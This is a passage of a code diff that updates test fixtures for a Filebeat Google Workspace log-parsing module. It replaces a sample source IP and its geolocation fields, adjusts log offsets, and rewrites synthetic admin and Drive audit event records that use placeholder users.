         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3826,7 +3562,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_STRONG_AUTH\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3839,27 +3575,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 28244,
+        "log.offset": 28178,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3883,7 +3615,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3896,27 +3628,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 28638,
+        "log.offset": 28571,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3940,7 +3668,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3953,27 +3681,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 29014,
+        "log.offset": 28946,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3997,7 +3721,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNDELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation",
@@ -4010,27 +3734,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 29392,
+        "log.offset": 29323,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4054,7 +3774,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNSUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -4067,27 +3787,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 29769,
+        "log.offset": 29699,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4111,7 +3827,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -4124,27 +3840,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 30147,
+        "log.offset": 30076,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4168,7 +3880,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -4181,26 +3893,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 30532,
+        "log.offset": 30460,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4221,7 +3929,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info",
@@ -4234,27 +3942,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 30972,
+        "log.offset": 30899,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log
index 3cd073a73790..aa82eee6fe5e 100644
--- a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log
@@ -1,28 +1,28 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"add_to_folder","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_canceled","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_comment_added","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_requested","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"approval_reviewer_responded","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"create","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"delete","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"download","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"edit","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"add_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"move","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"preview","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"print","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"remove_from_folder","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}}
